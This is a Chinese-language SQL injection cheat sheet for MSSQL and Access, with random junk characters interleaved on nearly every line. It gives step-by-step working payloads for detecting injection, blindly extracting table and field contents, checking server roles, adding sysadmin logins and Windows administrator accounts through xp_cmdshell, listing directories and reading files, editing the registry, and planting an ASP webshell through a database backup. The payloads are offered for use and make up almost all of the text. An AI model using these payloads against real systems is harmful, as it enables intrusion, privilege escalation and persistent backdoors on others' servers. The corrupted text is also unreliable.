1.判断是否有注入;and 1=1 ;and 1=2 0s{�7=Ef��
2.初步判断是否是mssql ;and user>0 �IsJ��x5GO
PJ?�C[+&��
3.注入参数是字符'and [查询条件] and ''=' (C��
uM*-�
XHdh�SFpm�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' f[R�~oc5P0
��b�WlY�Q
5.判断数据库系统 _!vy�|,w@e
4��{��vEW(
;and (select count(*) from sysobjects)>0 mssql |�N))�,/R_
|*b��-�m k
;and (select count(*) from msysobjects)>0 access L �A��A(2�
XpkOC�o�02
|�'P$z�MAF
z�G/? wP"
6.猜数据库 ;and (select Count(*) from [数据库名])>0 k?L2�L�IB<
Ndb�7>�"�W
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Jd �v;+HN[
'3sySsD&O
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 h<>�yzr3fN
9;\mq�'v�%
9.(1)猜字段的ascii值(access) wD$UShnm9-
E8R;S}P�A�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ��S-3hLw&?
)[M�:#;�,L
(2)猜字段的ascii值(mssql) ":s_��O�.�
Wc�M\4q�@�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �q
&{<H�cP
X'�s<�+hK&
10.测试权限结构(mssql) #pK"�
^O*!
u^JsKG+,:�
�YHu]\�'Ff
lsO����fpJ
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ��n{��etDO
@^.W|Z�h[&
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- VlL%�dN;
0
53�a����^9
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- j!�%^6Io4�
U1l��qg?KO
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- h9}*_qc&kV
mW��{��>��
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 9���6�#]P�
7�m]J7 �+4
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �F�Y�^�N�n
|S�|'o*�u
;and 1=(select IS_MEMBER('db_owner'));-- �<�Q- m� &
��;y�1/b(t
yf8kB�T:&S
��\we�g%�a
11.添加mssql和系统的帐户 tk=S4�/VWv
�d}ycC.h4k
;exec master.dbo.sp_addlogin username;-- ~F�wb�i��
;exec master.dbo.sp_password null,username,password;-- ~7*2Jp'��
&�(32s!�qH
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- NW 2�`)e�'
K�r|.I2?"�
;exec master.dbo.xp_cmdshell 'net user username password ^[�Ka+E^Q
� O&|<2Qr�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- $6D*�G�-*8
(*Q��:'2�e
;exec master.dbo.xp_cmdshell 'net user username password /add';-- K5XW&|�tY!
�Av�5:/c.B
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 2=0HQXXrq�
�>{:hadUH�
d��Y~z6bT�
�4�G&�dBH
12.(1)遍历目录 E0�&d*�BI2
f�b�bbTZy�
;create table dirs(paths varchar(100), id int) D�at',�5��
��C}K�l��!
;insert dirs exec master.dbo.xp_dirtree 'c:\' � �fCJjFL:
[?KGLUmTAI
;and (select top 1 paths from dirs)>0 5~�:/%+F0=
aVc{��� aP
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 3�+h���3?�
+s"6[\�H1d
S**eI<QFSk
Z�cy�GLg0I
(2)遍历目录 \i�%mokfbc
��(4A'$O2�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- [x>J�u&))$
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 )hj:Xpj�9#
E�
�B�B�d
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 4m1�r@��
$
C�gh8�4
2%
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 NE8W�--Cg|
tB,�(12@W�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ��sTle��l&
j�a';NIO-�
�B�#SVN Lv
(A6~m�i r!
13.mssql中的存储过程 z^Ik��b(KC
ozRTY9S
_;
xp_regenumvalues 注册表根键, 子键 ��R( FQ+h
@y��`xFPB�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �ZqVbNIY��
^sLx3�a���
xp_regread 根键,子键,键值名 }>�u `8'2v
H%�>4z3n
�
;exec xp_regread y@!�o&,,mq
g)#{<�#�*2
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 d�>�8"�-$�
o1$u�;}^�|
xp_regwrite 根键,子键, 值名, 值类型, 值 4<�F
�z![>
�&E�Qhk�9j
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Lt��M�M89u
}\7UU?@�n�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ��9 =;mY�
4#0�3x:/<\
xp_regdeletevalue 根键,子键,值名 Kh(`�6 ��f
f=R+]XP�zz
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ��gaY&2���
�f;zNNx<
;
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 m3lz#Pm'0
.=#j��d�c/
CG=c@-"n/�
K�\F0nToJ.
14.mssql的backup创建webshell L��4g�%o9G
r�8Pd}ptPU
use model �,=m.WmXE
IL ��%]4,�
create table cmd(str image); =xI���'�|%
�J� @��"#�
insert into cmd(str) values (''); +hmF�F�QQ}
@9gZH_ur>E
backup database model to disk='c:\l.asp'; g8%O^)d=>�
&P|[Y�P37_
x [FLV8`b|
:BF���? �r
15.mssql内置函数
[��fa�4��
A>�y��U0\A
;and (select @@version)>0 获得Windows的版本号 l:!L+�t*}6
w!�7\�wI�[
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �Y��7VO:o
�YzI�;���)
;and (select user_name())>0 爆当前系统的连接用户 `��R[ZY!=+
.Q�*X5�F�c
;and (select db_name())>0 得到当前连接的数据库 [s��{�!��
St�-uE�|8
Y$r78��h=4
WVy'f|��3;
16.简洁的webshell �~h�La�n&T
@dD��eOn�F
use model pFd8p�@m_2
�"n!y��K��
create table cmd(str image); ;"wC�BuXcu
tF0�jH+7J-
insert into cmd(str) values (''); �B���;1qy[
~.m�<`~�u�
backup database model to disk='g:\wwwtest\l.asp';
